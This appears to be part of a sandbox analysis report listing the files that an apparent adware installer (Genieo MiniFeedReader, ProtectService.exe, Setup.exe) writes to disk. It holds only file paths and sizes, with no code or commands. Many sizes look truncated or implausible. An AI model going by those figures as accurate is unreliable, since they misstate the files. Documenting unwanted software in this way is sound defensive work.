C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon.png (432 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\blockTopic.png (137 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\shekerKolshehu.gif (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\shadowh.png (944 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\share_unfollow_old.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers-scattered.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reportBugButton.png (777 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\button-enable.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\css\main.css (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_image_frame.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon12px.png (543 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\ad_no_image.gif (594 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_prev.png (153 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\googleimg.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\background.png (386 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\settings_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow.png (206 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\headlines_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_auth_start.png (440 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extChromeMac2.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack3.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\x.gif (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\message_tip.png (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-showers.png (959 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_9.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\signUpButton2.png (704 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\main.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\double_border.png (133 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_en.properties (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\general.css (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_btn.png (309 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\css\aggregation_page.css (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\anabel_analytics.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\miniview_ui.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\birthday_no_birthdays_bg.png (883 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tryItNow.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_disabled_nav_prev.png (164 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\all-genieo-sp-list.txt (837 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-nodebug.js (159 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\cakes.png (16 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery.cookie.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\magazine_ribon.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\test_items.js (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\hp_guard.html (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_word.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.classpath (355 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\startpage.css (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2.png (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extFirefoxMac2.png (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\tpl\startpage.tpl (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\parent_proxy.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\js\utils.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\ticker.js (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fail.png (658 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariMacEnableExts.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton2.png (997 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\aggregation_page.js (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fbButton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\index.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebook_icon12px.png (592 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\settings\anabel_settings.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\box_collapse.png (154 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\blank.html (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.properties (1856 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\userpic_overlay.png (190 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicBg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\lang\field_fr.json (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3rightButton.png (711 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev.gif (853 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\facebookShareIcon.png (311 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\btn.png (750 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\cmd_close.png (155 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\photos.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\const.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\notification_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pnf.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iPhoneOk.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\goRssButton.png (790 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\older_items_btn.png (249 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\followbutton.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\topicDefault.png (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_icon.png (798 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\normalLevel.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\hide_notification.png (165 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\empty.gif (43 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\collage\template3.html (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\prowered_by_google.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_7.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\DebugUtils.js (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\close.png (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_bg.gif (834 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\disconnectTwitterBtn.png (690 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\jquery-genieo-postmessage.js (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\popup_bg_white.png (121 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\previewShare.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_bird2.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\extSafariWin2.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\you_tube.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_yellow_down.png (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack5sm.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\footer_right_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\redHome.png (8 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\reopen_btn.png (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\activity-indicator.gif (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waitingTr.gif (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\defaultCover.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\rss.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\layers.css (9 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\birthday\share_btn.png (553 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\medium_video_frame.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\hover_bg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\personalizationMeter.css (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\fb_icon_big.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sethpButton.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\follow.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\anabel_ui_pages.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\iphone.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\set_as_homepage_bg.png (993 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\fb.gif (97 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\default_favicon.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tutorial.png (5520 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\strip.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\waiting.gif (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_2.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\settings.css (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\actions.png (588 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\menu_bg.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\translator.js (5 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\red_arror_down.png (143 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack4sm.png (961 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\warning.png (380 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\videobutton.png (862 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_white.png (222 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\feedbackButton.png (851 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\noItems.png (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\x_white.gif (53 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\genieo_slogan_inner_fr.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tmpl3leftButton.png (687 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\redarr.png (484 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_sep.gif (52 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\forPictures.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\layers.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\js\notification-debug.js (534 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm1frame2sm.png (10 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\wt.png (331 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\arrow_down_disable.gif (821 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\open_splash.png (696 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\poweredByGenieo.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\sendFeedbackButton2.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\shortcut.png (381 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-clear.png (682 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\item_controls_bg.png (167 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\connect_with_facebook.png (828 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\js\classes.js (13 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\easer.png (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\disabled_nav_prev2.gif (88 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\social_box.png (253 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\img\notification_controls.png (478 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\objectivehot_enabled_nav_next.png (150 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\tpl\main.tpl (4 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\underconstructions.jpg (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tm3frame_10sm.png (6 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\loader.gif (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\redArrow.png (262 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\sad.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif_big\img\play_icon.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\noPicture_.png (976 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\miniview\play_big.png (7 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\tools.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\trash.png (515 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\genieo_logo.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\template_factory.js (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_v.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\icons\thumb_down.png (703 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\miniview.css (12 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\mobile.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\Renderers.js (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\defaultPicture.png (11 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template2sm.png (1552 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\bigHotItemIcon.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template1sm.jpg (2392 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\template3.jpg (3312 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\magazinePreview\coverShadow.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\bigHotItemIcon.png (784 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\prog_bar.gif (101 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twit_pic.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\x_gray.png (193 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\pink.gif (801 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\topicDefault.gif (565 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\birthday.html (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\twitter_x.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\footer_left.png (256 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\notif\tpl\main.tpl (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\js\prototype.postmessage.js (3 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\img\tack2sm.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\weather-few-clouds.png (763 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\pagelet_tip_white_down.png (191 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\personalizationMeter\lowLevel.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\settings\okCancelButton.png (734 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dfImg.png (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\core\img\dot_clear.gif (42 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\shared\js\genieo_is_installed.js (37 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\img\new\bday_image.png (2 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\StartPage\css\ie9.css (1 bytes)
C:\Users\"%CurrentUserName%"\AppData\Roaming\Genieo\Application\MiniFeedReader\.settings\org.eclipse.core.resources.prefs (124 bytes)
The process ProtectService.exe:3188 makes changes in the file system.
The Application creates and/or writes to the following file(s):
C:\ProgramData\IHProtectUpDate\update\conf (5 bytes)
The process Setup.exe:4008 makes changes in the file system.
The Application creates and/or writes to the following file(s):
%Program Files% (x86)\GPLGS\traceop.ps (2 bytes)
%Program Files% (x86)\GPLGS\fonts.dir (27 bytes)
%Program Files% (x86)\GPLGS\zeroline.ps (2 bytes)
%Program Files% (x86)\GPLGS\viewcmyk.ps (2 bytes)
%Program Files% (x86)\GPLGS\quit.ps (6 bytes)
%Program Files% (x86)\GPLGS\pv.sh (1 bytes)
%Program Files% (x86)\GPLGS\Fontmap.Ult (6 bytes)
%Program Files% (x86)\GPLGS\markhint.ps (3 bytes)
%Program Files% (x86)\GPLGS\gs_fonts.ps (45 bytes)
%Program Files% (x86)\GPLGS\z003034l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_il1_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\n021004l.pfb (601 bytes)
%Program Files% (x86)\GPLGS\gs_diskf.ps (7 bytes)
%Program Files% (x86)\GPLGS\gs_wl2_e.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_wan_e.ps (1 bytes)
%Program Files% (x86)\GPLGS\fonts.scale (27 bytes)
%Program Files% (x86)\GPLGS\viewps2a.ps (1 bytes)
%Program Files% (x86)\GPLGS\Fontmap.VMS (14 bytes)
%Program Files% (x86)\GPLGS\gsnup.ps (2 bytes)
%Program Files% (x86)\GPLGS\gs_stres.ps (4 bytes)
